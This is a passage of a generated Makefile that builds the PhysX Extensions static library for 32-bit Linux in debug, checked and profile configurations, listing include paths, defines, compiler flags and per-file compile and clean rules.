PhysXExtensions_debug_hpaths += ./../../GeomUtils/src/distance
PhysXExtensions_debug_hpaths += ./../../GeomUtils/src/gjk
PhysXExtensions_debug_hpaths += ./../../GeomUtils/src/intersection
PhysXExtensions_debug_hpaths += ./../../GeomUtils/src/mesh
PhysXExtensions_debug_hpaths += ./../../GeomUtils/src/hf
PhysXExtensions_debug_hpaths += ./../../GeomUtils/src/pcm
PhysXExtensions_debug_hpaths += ./../../PhysXMetaData/core/include
PhysXExtensions_debug_hpaths += ./../../PhysXMetaData/extensions/include
PhysXExtensions_debug_hpaths += ./../../PhysXExtensions/src
PhysXExtensions_debug_hpaths += ./../../PhysXExtensions/src/serialization/Xml
PhysXExtensions_debug_hpaths += ./../../PhysXExtensions/src/serialization/Binary
PhysXExtensions_debug_hpaths += ./../../PhysXExtensions/src/serialization/File
PhysXExtensions_debug_hpaths += ./../../PvdSDK/src
PhysXExtensions_debug_hpaths += ./../../PhysX/src
PhysXExtensions_debug_lpaths :=
PhysXExtensions_debug_lpaths += ./../../../../PxShared/lib/linux32
PhysXExtensions_debug_defines := $(PhysXExtensions_custom_defines)
PhysXExtensions_debug_defines += PX_BUILD_NUMBER=0
PhysXExtensions_debug_defines += PX_PHYSX_STATIC_LIB
PhysXExtensions_debug_defines += _DEBUG
PhysXExtensions_debug_defines += PX_DEBUG=1
PhysXExtensions_debug_defines += PX_CHECKED=1
PhysXExtensions_debug_defines += PX_SUPPORT_PVD=1
PhysXExtensions_debug_libraries :=
PhysXExtensions_debug_libraries += PsFastXmlDEBUG
PhysXExtensions_debug_common_cflags := $(PhysXExtensions_custom_cflags)
PhysXExtensions_debug_common_cflags += -MMD
PhysXExtensions_debug_common_cflags += $(addprefix -D, $(PhysXExtensions_debug_defines))
PhysXExtensions_debug_common_cflags += $(addprefix -I, $(PhysXExtensions_debug_hpaths))
PhysXExtensions_debug_common_cflags += -m32
PhysXExtensions_debug_common_cflags += -Werror -m32 -fPIC -msse2 -mfpmath=sse -malign-double -fno-exceptions -fno-rtti -fvisibility=hidden -fvisibility-inlines-hidden
PhysXExtensions_debug_common_cflags += -Wall -Wextra -Wstrict-aliasing=2 -fdiagnostics-show-option
PhysXExtensions_debug_common_cflags += -Wno-invalid-offsetof -Wno-uninitialized -Wno-implicit-fallthrough
PhysXExtensions_debug_common_cflags += -Wno-missing-field-initializers
PhysXExtensions_debug_common_cflags += -g3 -gdwarf-2
PhysXExtensions_debug_cflags := $(PhysXExtensions_debug_common_cflags)
PhysXExtensions_debug_cppflags := $(PhysXExtensions_debug_common_cflags)
PhysXExtensions_debug_lflags := $(PhysXExtensions_custom_lflags)
PhysXExtensions_debug_lflags += $(addprefix -L, $(PhysXExtensions_debug_lpaths))
PhysXExtensions_debug_lflags += -Wl,--start-group $(addprefix -l, $(PhysXExtensions_debug_libraries)) -Wl,--end-group
PhysXExtensions_debug_lflags += -lrt
PhysXExtensions_debug_lflags += -m32
PhysXExtensions_debug_objsdir = $(OBJS_DIR)/PhysXExtensions_debug
PhysXExtensions_debug_cpp_o = $(addprefix $(PhysXExtensions_debug_objsdir)/, $(subst ./, , $(subst ../, , $(patsubst %.cpp, %.cpp.o, $(PhysXExtensions_cppfiles)))))
PhysXExtensions_debug_cc_o = $(addprefix $(PhysXExtensions_debug_objsdir)/, $(subst ./, , $(subst ../, , $(patsubst %.cc, %.cc.o, $(PhysXExtensions_ccfiles)))))
PhysXExtensions_debug_c_o = $(addprefix $(PhysXExtensions_debug_objsdir)/, $(subst ./, , $(subst ../, , $(patsubst %.c, %.c.o, $(PhysXExtensions_cfiles)))))
PhysXExtensions_debug_obj = $(PhysXExtensions_debug_cpp_o) $(PhysXExtensions_debug_cc_o) $(PhysXExtensions_debug_c_o)
PhysXExtensions_debug_bin := ./../../../Lib/linux32/libPhysX3ExtensionsDEBUG.a
clean_PhysXExtensions_debug:
@$(ECHO) clean PhysXExtensions debug
@$(RMDIR) $(PhysXExtensions_debug_objsdir)
@$(RMDIR) $(PhysXExtensions_debug_bin)
@$(RMDIR) $(DEPSDIR)/PhysXExtensions/debug
build_PhysXExtensions_debug: postbuild_PhysXExtensions_debug
postbuild_PhysXExtensions_debug: mainbuild_PhysXExtensions_debug
mainbuild_PhysXExtensions_debug: prebuild_PhysXExtensions_debug $(PhysXExtensions_debug_bin)
prebuild_PhysXExtensions_debug:
$(PhysXExtensions_debug_bin): $(PhysXExtensions_debug_obj) build_PsFastXml_debug
mkdir -p `dirname ./../../../Lib/linux32/libPhysX3ExtensionsDEBUG.a`
@$(AR) rcs $(PhysXExtensions_debug_bin) $(PhysXExtensions_debug_obj)
$(ECHO) building $@ complete!
PhysXExtensions_debug_DEPDIR = $(dir $(@))/$(*F)
$(PhysXExtensions_debug_cpp_o): $(PhysXExtensions_debug_objsdir)/%.o:
$(ECHO) PhysXExtensions: compiling debug $(filter %$(strip $(subst .cpp.o,.cpp, $(subst $(PhysXExtensions_debug_objsdir),, $@))), $(PhysXExtensions_cppfiles))...
mkdir -p $(dir $(@))
$(CXX) $(PhysXExtensions_debug_cppflags) -c $(filter %$(strip $(subst .cpp.o,.cpp, $(subst $(PhysXExtensions_debug_objsdir),, $@))), $(PhysXExtensions_cppfiles)) -o $@
@mkdir -p $(dir $(addprefix $(DEPSDIR)/PhysXExtensions/debug/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cpp.o,.cpp, $(subst $(PhysXExtensions_debug_objsdir),, $@))), $(PhysXExtensions_cppfiles))))))
cp $(PhysXExtensions_debug_DEPDIR).d $(addprefix $(DEPSDIR)/PhysXExtensions/debug/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cpp.o,.cpp, $(subst $(PhysXExtensions_debug_objsdir),, $@))), $(PhysXExtensions_cppfiles))))).P; \
sed -e 's/#.*//' -e 's/^[^:]*: *//' -e 's/ *\\$$//' \
-e '/^$$/ d' -e 's/$$/ :/' < $(PhysXExtensions_debug_DEPDIR).d >> $(addprefix $(DEPSDIR)/PhysXExtensions/debug/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cpp.o,.cpp, $(subst $(PhysXExtensions_debug_objsdir),, $@))), $(PhysXExtensions_cppfiles))))).P; \
rm -f $(PhysXExtensions_debug_DEPDIR).d
$(PhysXExtensions_debug_cc_o): $(PhysXExtensions_debug_objsdir)/%.o:
$(ECHO) PhysXExtensions: compiling debug $(filter %$(strip $(subst .cc.o,.cc, $(subst $(PhysXExtensions_debug_objsdir),, $@))), $(PhysXExtensions_ccfiles))...
mkdir -p $(dir $(@))
$(CXX) $(PhysXExtensions_debug_cppflags) -c $(filter %$(strip $(subst .cc.o,.cc, $(subst $(PhysXExtensions_debug_objsdir),, $@))), $(PhysXExtensions_ccfiles)) -o $@
mkdir -p $(dir $(addprefix $(DEPSDIR)/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cc.o,.cc, $(subst $(PhysXExtensions_debug_objsdir),, $@))), $(PhysXExtensions_ccfiles))))))
cp $(PhysXExtensions_debug_DEPDIR).d $(addprefix $(DEPSDIR)/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cc.o,.cc, $(subst $(PhysXExtensions_debug_objsdir),, $@))), $(PhysXExtensions_ccfiles))))).debug.P; \
sed -e 's/#.*//' -e 's/^[^:]*: *//' -e 's/ *\\$$//' \
-e '/^$$/ d' -e 's/$$/ :/' < $(PhysXExtensions_debug_DEPDIR).d >> $(addprefix $(DEPSDIR)/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cc.o,.cc, $(subst $(PhysXExtensions_debug_objsdir),, $@))), $(PhysXExtensions_ccfiles))))).debug.P; \
rm -f $(PhysXExtensions_debug_DEPDIR).d
$(PhysXExtensions_debug_c_o): $(PhysXExtensions_debug_objsdir)/%.o:
$(ECHO) PhysXExtensions: compiling debug $(filter %$(strip $(subst .c.o,.c, $(subst $(PhysXExtensions_debug_objsdir),, $@))), $(PhysXExtensions_cfiles))...
mkdir -p $(dir $(@))
$(CC) $(PhysXExtensions_debug_cflags) -c $(filter %$(strip $(subst .c.o,.c, $(subst $(PhysXExtensions_debug_objsdir),, $@))), $(PhysXExtensions_cfiles)) -o $@
@mkdir -p $(dir $(addprefix $(DEPSDIR)/PhysXExtensions/debug/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .c.o,.c, $(subst $(PhysXExtensions_debug_objsdir),, $@))), $(PhysXExtensions_cfiles))))))
cp $(PhysXExtensions_debug_DEPDIR).d $(addprefix $(DEPSDIR)/PhysXExtensions/debug/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .c.o,.c, $(subst $(PhysXExtensions_debug_objsdir),, $@))), $(PhysXExtensions_cfiles))))).P; \
sed -e 's/#.*//' -e 's/^[^:]*: *//' -e 's/ *\\$$//' \
-e '/^$$/ d' -e 's/$$/ :/' < $(PhysXExtensions_debug_DEPDIR).d >> $(addprefix $(DEPSDIR)/PhysXExtensions/debug/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .c.o,.c, $(subst $(PhysXExtensions_debug_objsdir),, $@))), $(PhysXExtensions_cfiles))))).P; \
rm -f $(PhysXExtensions_debug_DEPDIR).d
PhysXExtensions_checked_hpaths :=
PhysXExtensions_checked_hpaths += ./../../Common/include
PhysXExtensions_checked_hpaths += ./../../../../PxShared/include
PhysXExtensions_checked_hpaths += ./../../../../PxShared/src/foundation/include
PhysXExtensions_checked_hpaths += ./../../../../PxShared/src/fastxml/include
PhysXExtensions_checked_hpaths += ./../../../../PxShared/src/pvd/include
PhysXExtensions_checked_hpaths += ./../../../Include/common
PhysXExtensions_checked_hpaths += ./../../../Include/geometry
PhysXExtensions_checked_hpaths += ./../../../Include/GeomUtils
PhysXExtensions_checked_hpaths += ./../../../Include/pvd
PhysXExtensions_checked_hpaths += ./../../../Include/cooking
PhysXExtensions_checked_hpaths += ./../../../Include/extensions
PhysXExtensions_checked_hpaths += ./../../../Include/vehicle
PhysXExtensions_checked_hpaths += ./../../../Include/cloth
PhysXExtensions_checked_hpaths += ./../../../Include
PhysXExtensions_checked_hpaths += ./../../Common/src
PhysXExtensions_checked_hpaths += ./../../GeomUtils/headers
PhysXExtensions_checked_hpaths += ./../../GeomUtils/src
PhysXExtensions_checked_hpaths += ./../../GeomUtils/src/contact
PhysXExtensions_checked_hpaths += ./../../GeomUtils/src/common
PhysXExtensions_checked_hpaths += ./../../GeomUtils/src/convex
PhysXExtensions_checked_hpaths += ./../../GeomUtils/src/distance
PhysXExtensions_checked_hpaths += ./../../GeomUtils/src/gjk
PhysXExtensions_checked_hpaths += ./../../GeomUtils/src/intersection
PhysXExtensions_checked_hpaths += ./../../GeomUtils/src/mesh
PhysXExtensions_checked_hpaths += ./../../GeomUtils/src/hf
PhysXExtensions_checked_hpaths += ./../../GeomUtils/src/pcm
PhysXExtensions_checked_hpaths += ./../../PhysXMetaData/core/include
PhysXExtensions_checked_hpaths += ./../../PhysXMetaData/extensions/include
PhysXExtensions_checked_hpaths += ./../../PhysXExtensions/src
PhysXExtensions_checked_hpaths += ./../../PhysXExtensions/src/serialization/Xml
PhysXExtensions_checked_hpaths += ./../../PhysXExtensions/src/serialization/Binary
PhysXExtensions_checked_hpaths += ./../../PhysXExtensions/src/serialization/File
PhysXExtensions_checked_hpaths += ./../../PvdSDK/src
PhysXExtensions_checked_hpaths += ./../../PhysX/src
PhysXExtensions_checked_lpaths :=
PhysXExtensions_checked_lpaths += ./../../../../PxShared/lib/linux32
PhysXExtensions_checked_defines := $(PhysXExtensions_custom_defines)
PhysXExtensions_checked_defines += PX_BUILD_NUMBER=0
PhysXExtensions_checked_defines += PX_PHYSX_STATIC_LIB
PhysXExtensions_checked_defines += NDEBUG
PhysXExtensions_checked_defines += PX_CHECKED=1
PhysXExtensions_checked_defines += PX_SUPPORT_PVD=1
PhysXExtensions_checked_libraries :=
PhysXExtensions_checked_libraries += PsFastXmlCHECKED
PhysXExtensions_checked_common_cflags := $(PhysXExtensions_custom_cflags)
PhysXExtensions_checked_common_cflags += -MMD
PhysXExtensions_checked_common_cflags += $(addprefix -D, $(PhysXExtensions_checked_defines))
PhysXExtensions_checked_common_cflags += $(addprefix -I, $(PhysXExtensions_checked_hpaths))
PhysXExtensions_checked_common_cflags += -m32
PhysXExtensions_checked_common_cflags += -Werror -m32 -fPIC -msse2 -mfpmath=sse -malign-double -fno-exceptions -fno-rtti -fvisibility=hidden -fvisibility-inlines-hidden
PhysXExtensions_checked_common_cflags += -Wall -Wextra -Wstrict-aliasing=2 -fdiagnostics-show-option
PhysXExtensions_checked_common_cflags += -Wno-invalid-offsetof -Wno-uninitialized -Wno-implicit-fallthrough
PhysXExtensions_checked_common_cflags += -Wno-missing-field-initializers
PhysXExtensions_checked_common_cflags += -g3 -gdwarf-2 -O3 -fno-strict-aliasing
PhysXExtensions_checked_cflags := $(PhysXExtensions_checked_common_cflags)
PhysXExtensions_checked_cppflags := $(PhysXExtensions_checked_common_cflags)
PhysXExtensions_checked_lflags := $(PhysXExtensions_custom_lflags)
PhysXExtensions_checked_lflags += $(addprefix -L, $(PhysXExtensions_checked_lpaths))
PhysXExtensions_checked_lflags += -Wl,--start-group $(addprefix -l, $(PhysXExtensions_checked_libraries)) -Wl,--end-group
PhysXExtensions_checked_lflags += -lrt
PhysXExtensions_checked_lflags += -m32
PhysXExtensions_checked_objsdir = $(OBJS_DIR)/PhysXExtensions_checked
PhysXExtensions_checked_cpp_o = $(addprefix $(PhysXExtensions_checked_objsdir)/, $(subst ./, , $(subst ../, , $(patsubst %.cpp, %.cpp.o, $(PhysXExtensions_cppfiles)))))
PhysXExtensions_checked_cc_o = $(addprefix $(PhysXExtensions_checked_objsdir)/, $(subst ./, , $(subst ../, , $(patsubst %.cc, %.cc.o, $(PhysXExtensions_ccfiles)))))
PhysXExtensions_checked_c_o = $(addprefix $(PhysXExtensions_checked_objsdir)/, $(subst ./, , $(subst ../, , $(patsubst %.c, %.c.o, $(PhysXExtensions_cfiles)))))
PhysXExtensions_checked_obj = $(PhysXExtensions_checked_cpp_o) $(PhysXExtensions_checked_cc_o) $(PhysXExtensions_checked_c_o)
PhysXExtensions_checked_bin := ./../../../Lib/linux32/libPhysX3ExtensionsCHECKED.a
clean_PhysXExtensions_checked:
@$(ECHO) clean PhysXExtensions checked
@$(RMDIR) $(PhysXExtensions_checked_objsdir)
@$(RMDIR) $(PhysXExtensions_checked_bin)
@$(RMDIR) $(DEPSDIR)/PhysXExtensions/checked
build_PhysXExtensions_checked: postbuild_PhysXExtensions_checked
postbuild_PhysXExtensions_checked: mainbuild_PhysXExtensions_checked
mainbuild_PhysXExtensions_checked: prebuild_PhysXExtensions_checked $(PhysXExtensions_checked_bin)
prebuild_PhysXExtensions_checked:
$(PhysXExtensions_checked_bin): $(PhysXExtensions_checked_obj) build_PsFastXml_checked
mkdir -p `dirname ./../../../Lib/linux32/libPhysX3ExtensionsCHECKED.a`
@$(AR) rcs $(PhysXExtensions_checked_bin) $(PhysXExtensions_checked_obj)
$(ECHO) building $@ complete!
PhysXExtensions_checked_DEPDIR = $(dir $(@))/$(*F)
$(PhysXExtensions_checked_cpp_o): $(PhysXExtensions_checked_objsdir)/%.o:
$(ECHO) PhysXExtensions: compiling checked $(filter %$(strip $(subst .cpp.o,.cpp, $(subst $(PhysXExtensions_checked_objsdir),, $@))), $(PhysXExtensions_cppfiles))...
mkdir -p $(dir $(@))
$(CXX) $(PhysXExtensions_checked_cppflags) -c $(filter %$(strip $(subst .cpp.o,.cpp, $(subst $(PhysXExtensions_checked_objsdir),, $@))), $(PhysXExtensions_cppfiles)) -o $@
@mkdir -p $(dir $(addprefix $(DEPSDIR)/PhysXExtensions/checked/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cpp.o,.cpp, $(subst $(PhysXExtensions_checked_objsdir),, $@))), $(PhysXExtensions_cppfiles))))))
cp $(PhysXExtensions_checked_DEPDIR).d $(addprefix $(DEPSDIR)/PhysXExtensions/checked/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cpp.o,.cpp, $(subst $(PhysXExtensions_checked_objsdir),, $@))), $(PhysXExtensions_cppfiles))))).P; \
sed -e 's/#.*//' -e 's/^[^:]*: *//' -e 's/ *\\$$//' \
-e '/^$$/ d' -e 's/$$/ :/' < $(PhysXExtensions_checked_DEPDIR).d >> $(addprefix $(DEPSDIR)/PhysXExtensions/checked/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cpp.o,.cpp, $(subst $(PhysXExtensions_checked_objsdir),, $@))), $(PhysXExtensions_cppfiles))))).P; \
rm -f $(PhysXExtensions_checked_DEPDIR).d
$(PhysXExtensions_checked_cc_o): $(PhysXExtensions_checked_objsdir)/%.o:
$(ECHO) PhysXExtensions: compiling checked $(filter %$(strip $(subst .cc.o,.cc, $(subst $(PhysXExtensions_checked_objsdir),, $@))), $(PhysXExtensions_ccfiles))...
mkdir -p $(dir $(@))
$(CXX) $(PhysXExtensions_checked_cppflags) -c $(filter %$(strip $(subst .cc.o,.cc, $(subst $(PhysXExtensions_checked_objsdir),, $@))), $(PhysXExtensions_ccfiles)) -o $@
mkdir -p $(dir $(addprefix $(DEPSDIR)/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cc.o,.cc, $(subst $(PhysXExtensions_checked_objsdir),, $@))), $(PhysXExtensions_ccfiles))))))
cp $(PhysXExtensions_checked_DEPDIR).d $(addprefix $(DEPSDIR)/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cc.o,.cc, $(subst $(PhysXExtensions_checked_objsdir),, $@))), $(PhysXExtensions_ccfiles))))).checked.P; \
sed -e 's/#.*//' -e 's/^[^:]*: *//' -e 's/ *\\$$//' \
-e '/^$$/ d' -e 's/$$/ :/' < $(PhysXExtensions_checked_DEPDIR).d >> $(addprefix $(DEPSDIR)/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cc.o,.cc, $(subst $(PhysXExtensions_checked_objsdir),, $@))), $(PhysXExtensions_ccfiles))))).checked.P; \
rm -f $(PhysXExtensions_checked_DEPDIR).d
$(PhysXExtensions_checked_c_o): $(PhysXExtensions_checked_objsdir)/%.o:
$(ECHO) PhysXExtensions: compiling checked $(filter %$(strip $(subst .c.o,.c, $(subst $(PhysXExtensions_checked_objsdir),, $@))), $(PhysXExtensions_cfiles))...
mkdir -p $(dir $(@))
$(CC) $(PhysXExtensions_checked_cflags) -c $(filter %$(strip $(subst .c.o,.c, $(subst $(PhysXExtensions_checked_objsdir),, $@))), $(PhysXExtensions_cfiles)) -o $@
@mkdir -p $(dir $(addprefix $(DEPSDIR)/PhysXExtensions/checked/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .c.o,.c, $(subst $(PhysXExtensions_checked_objsdir),, $@))), $(PhysXExtensions_cfiles))))))
cp $(PhysXExtensions_checked_DEPDIR).d $(addprefix $(DEPSDIR)/PhysXExtensions/checked/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .c.o,.c, $(subst $(PhysXExtensions_checked_objsdir),, $@))), $(PhysXExtensions_cfiles))))).P; \
sed -e 's/#.*//' -e 's/^[^:]*: *//' -e 's/ *\\$$//' \
-e '/^$$/ d' -e 's/$$/ :/' < $(PhysXExtensions_checked_DEPDIR).d >> $(addprefix $(DEPSDIR)/PhysXExtensions/checked/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .c.o,.c, $(subst $(PhysXExtensions_checked_objsdir),, $@))), $(PhysXExtensions_cfiles))))).P; \
rm -f $(PhysXExtensions_checked_DEPDIR).d
PhysXExtensions_profile_hpaths :=
PhysXExtensions_profile_hpaths += ./../../Common/include
PhysXExtensions_profile_hpaths += ./../../../../PxShared/include
PhysXExtensions_profile_hpaths += ./../../../../PxShared/src/foundation/include
PhysXExtensions_profile_hpaths += ./../../../../PxShared/src/fastxml/include
PhysXExtensions_profile_hpaths += ./../../../../PxShared/src/pvd/include
PhysXExtensions_profile_hpaths += ./../../../Include/common
PhysXExtensions_profile_hpaths += ./../../../Include/geometry
PhysXExtensions_profile_hpaths += ./../../../Include/GeomUtils
PhysXExtensions_profile_hpaths += ./../../../Include/pvd
PhysXExtensions_profile_hpaths += ./../../../Include/cooking
PhysXExtensions_profile_hpaths += ./../../../Include/extensions
PhysXExtensions_profile_hpaths += ./../../../Include/vehicle
PhysXExtensions_profile_hpaths += ./../../../Include/cloth
PhysXExtensions_profile_hpaths += ./../../../Include
PhysXExtensions_profile_hpaths += ./../../Common/src
PhysXExtensions_profile_hpaths += ./../../GeomUtils/headers
PhysXExtensions_profile_hpaths += ./../../GeomUtils/src
PhysXExtensions_profile_hpaths += ./../../GeomUtils/src/contact
PhysXExtensions_profile_hpaths += ./../../GeomUtils/src/common
PhysXExtensions_profile_hpaths += ./../../GeomUtils/src/convex
PhysXExtensions_profile_hpaths += ./../../GeomUtils/src/distance
PhysXExtensions_profile_hpaths += ./../../GeomUtils/src/gjk
PhysXExtensions_profile_hpaths += ./../../GeomUtils/src/intersection
PhysXExtensions_profile_hpaths += ./../../GeomUtils/src/mesh
PhysXExtensions_profile_hpaths += ./../../GeomUtils/src/hf
PhysXExtensions_profile_hpaths += ./../../GeomUtils/src/pcm
PhysXExtensions_profile_hpaths += ./../../PhysXMetaData/core/include
PhysXExtensions_profile_hpaths += ./../../PhysXMetaData/extensions/include
PhysXExtensions_profile_hpaths += ./../../PhysXExtensions/src
PhysXExtensions_profile_hpaths += ./../../PhysXExtensions/src/serialization/Xml
PhysXExtensions_profile_hpaths += ./../../PhysXExtensions/src/serialization/Binary
PhysXExtensions_profile_hpaths += ./../../PhysXExtensions/src/serialization/File
PhysXExtensions_profile_hpaths += ./../../PvdSDK/src
PhysXExtensions_profile_hpaths += ./../../PhysX/src
PhysXExtensions_profile_lpaths :=
PhysXExtensions_profile_lpaths += ./../../../../PxShared/lib/linux32
PhysXExtensions_profile_defines := $(PhysXExtensions_custom_defines)
PhysXExtensions_profile_defines += PX_BUILD_NUMBER=0
PhysXExtensions_profile_defines += PX_PHYSX_STATIC_LIB
PhysXExtensions_profile_defines += NDEBUG
PhysXExtensions_profile_defines += PX_PROFILE=1
PhysXExtensions_profile_defines += PX_SUPPORT_PVD=1
PhysXExtensions_profile_libraries :=
PhysXExtensions_profile_libraries += PsFastXmlPROFILE
PhysXExtensions_profile_common_cflags := $(PhysXExtensions_custom_cflags)
PhysXExtensions_profile_common_cflags += -MMD
PhysXExtensions_profile_common_cflags += $(addprefix -D, $(PhysXExtensions_profile_defines))
PhysXExtensions_profile_common_cflags += $(addprefix -I, $(PhysXExtensions_profile_hpaths))
PhysXExtensions_profile_common_cflags += -m32
PhysXExtensions_profile_common_cflags += -Werror -m32 -fPIC -msse2 -mfpmath=sse -malign-double -fno-exceptions -fno-rtti -fvisibility=hidden -fvisibility-inlines-hidden
PhysXExtensions_profile_common_cflags += -Wall -Wextra -Wstrict-aliasing=2 -fdiagnostics-show-option
PhysXExtensions_profile_common_cflags += -Wno-invalid-offsetof -Wno-uninitialized -Wno-implicit-fallthrough
PhysXExtensions_profile_common_cflags += -Wno-missing-field-initializers
PhysXExtensions_profile_common_cflags += -O3 -fno-strict-aliasing
PhysXExtensions_profile_cflags := $(PhysXExtensions_profile_common_cflags)
PhysXExtensions_profile_cppflags := $(PhysXExtensions_profile_common_cflags)
PhysXExtensions_profile_lflags := $(PhysXExtensions_custom_lflags)
PhysXExtensions_profile_lflags += $(addprefix -L, $(PhysXExtensions_profile_lpaths))
PhysXExtensions_profile_lflags += -Wl,--start-group $(addprefix -l, $(PhysXExtensions_profile_libraries)) -Wl,--end-group
PhysXExtensions_profile_lflags += -lrt
PhysXExtensions_profile_lflags += -m32
PhysXExtensions_profile_objsdir = $(OBJS_DIR)/PhysXExtensions_profile
PhysXExtensions_profile_cpp_o = $(addprefix $(PhysXExtensions_profile_objsdir)/, $(subst ./, , $(subst ../, , $(patsubst %.cpp, %.cpp.o, $(PhysXExtensions_cppfiles)))))
PhysXExtensions_profile_cc_o = $(addprefix $(PhysXExtensions_profile_objsdir)/, $(subst ./, , $(subst ../, , $(patsubst %.cc, %.cc.o, $(PhysXExtensions_ccfiles)))))
PhysXExtensions_profile_c_o = $(addprefix $(PhysXExtensions_profile_objsdir)/, $(subst ./, , $(subst ../, , $(patsubst %.c, %.c.o, $(PhysXExtensions_cfiles)))))
PhysXExtensions_profile_obj = $(PhysXExtensions_profile_cpp_o) $(PhysXExtensions_profile_cc_o) $(PhysXExtensions_profile_c_o)
PhysXExtensions_profile_bin := ./../../../Lib/linux32/libPhysX3ExtensionsPROFILE.a
clean_PhysXExtensions_profile:
@$(ECHO) clean PhysXExtensions profile
@$(RMDIR) $(PhysXExtensions_profile_objsdir)
@$(RMDIR) $(PhysXExtensions_profile_bin)
@$(RMDIR) $(DEPSDIR)/PhysXExtensions/profile
build_PhysXExtensions_profile: postbuild_PhysXExtensions_profile
postbuild_PhysXExtensions_profile: mainbuild_PhysXExtensions_profile
mainbuild_PhysXExtensions_profile: prebuild_PhysXExtensions_profile $(PhysXExtensions_profile_bin)
prebuild_PhysXExtensions_profile:
$(PhysXExtensions_profile_bin): $(PhysXExtensions_profile_obj) build_PsFastXml_profile
mkdir -p `dirname ./../../../Lib/linux32/libPhysX3ExtensionsPROFILE.a`
@$(AR) rcs $(PhysXExtensions_profile_bin) $(PhysXExtensions_profile_obj)
$(ECHO) building $@ complete!
PhysXExtensions_profile_DEPDIR = $(dir $(@))/$(*F)
$(PhysXExtensions_profile_cpp_o): $(PhysXExtensions_profile_objsdir)/%.o:
$(ECHO) PhysXExtensions: compiling profile $(filter %$(strip $(subst .cpp.o,.cpp, $(subst $(PhysXExtensions_profile_objsdir),, $@))), $(PhysXExtensions_cppfiles))...
mkdir -p $(dir $(@))
$(CXX) $(PhysXExtensions_profile_cppflags) -c $(filter %$(strip $(subst .cpp.o,.cpp, $(subst $(PhysXExtensions_profile_objsdir),, $@))), $(PhysXExtensions_cppfiles)) -o $@
@mkdir -p $(dir $(addprefix $(DEPSDIR)/PhysXExtensions/profile/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cpp.o,.cpp, $(subst $(PhysXExtensions_profile_objsdir),, $@))), $(PhysXExtensions_cppfiles))))))
cp $(PhysXExtensions_profile_DEPDIR).d $(addprefix $(DEPSDIR)/PhysXExtensions/profile/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cpp.o,.cpp, $(subst $(PhysXExtensions_profile_objsdir),, $@))), $(PhysXExtensions_cppfiles))))).P; \
sed -e 's/#.*//' -e 's/^[^:]*: *//' -e 's/ *\\$$//' \
-e '/^$$/ d' -e 's/$$/ :/' < $(PhysXExtensions_profile_DEPDIR).d >> $(addprefix $(DEPSDIR)/PhysXExtensions/profile/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cpp.o,.cpp, $(subst $(PhysXExtensions_profile_objsdir),, $@))), $(PhysXExtensions_cppfiles))))).P; \
rm -f $(PhysXExtensions_profile_DEPDIR).d
$(PhysXExtensions_profile_cc_o): $(PhysXExtensions_profile_objsdir)/%.o:
$(ECHO) PhysXExtensions: compiling profile $(filter %$(strip $(subst .cc.o,.cc, $(subst $(PhysXExtensions_profile_objsdir),, $@))), $(PhysXExtensions_ccfiles))...
mkdir -p $(dir $(@))
$(CXX) $(PhysXExtensions_profile_cppflags) -c $(filter %$(strip $(subst .cc.o,.cc, $(subst $(PhysXExtensions_profile_objsdir),, $@))), $(PhysXExtensions_ccfiles)) -o $@
mkdir -p $(dir $(addprefix $(DEPSDIR)/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cc.o,.cc, $(subst $(PhysXExtensions_profile_objsdir),, $@))), $(PhysXExtensions_ccfiles))))))
cp $(PhysXExtensions_profile_DEPDIR).d $(addprefix $(DEPSDIR)/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cc.o,.cc, $(subst $(PhysXExtensions_profile_objsdir),, $@))), $(PhysXExtensions_ccfiles))))).profile.P; \
sed -e 's/#.*//' -e 's/^[^:]*: *//' -e 's/ *\\$$//' \
-e '/^$$/ d' -e 's/$$/ :/' < $(PhysXExtensions_profile_DEPDIR).d >> $(addprefix $(DEPSDIR)/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cc.o,.cc, $(subst $(PhysXExtensions_profile_objsdir),, $@))), $(PhysXExtensions_ccfiles))))).profile.P; \
rm -f $(PhysXExtensions_profile_DEPDIR).d
$(PhysXExtensions_profile_c_o): $(PhysXExtensions_profile_objsdir)/%.o:
$(ECHO) PhysXExtensions: compiling profile $(filter %$(strip $(subst .c.o,.c, $(subst $(PhysXExtensions_profile_objsdir),, $@))), $(PhysXExtensions_cfiles))...
mkdir -p $(dir $(@))
$(CC) $(PhysXExtensions_profile_cflags) -c $(filter %$(strip $(subst .c.o,.c, $(subst $(PhysXExtensions_profile_objsdir),, $@))), $(PhysXExtensions_cfiles)) -o $@
@mkdir -p $(dir $(addprefix $(DEPSDIR)/PhysXExtensions/profile/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .c.o,.c, $(subst $(PhysXExtensions_profile_objsdir),, $@))), $(PhysXExtensions_cfiles))))))
cp $(PhysXExtensions_profile_DEPDIR).d $(addprefix $(DEPSDIR)/PhysXExtensions/profile/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .c.o,.c, $(subst $(PhysXExtensions_profile_objsdir),, $@))), $(PhysXExtensions_cfiles))))).P; \
sed -e 's/#.*//' -e 's/^[^:]*: *//' -e 's/ *\\$$//' \
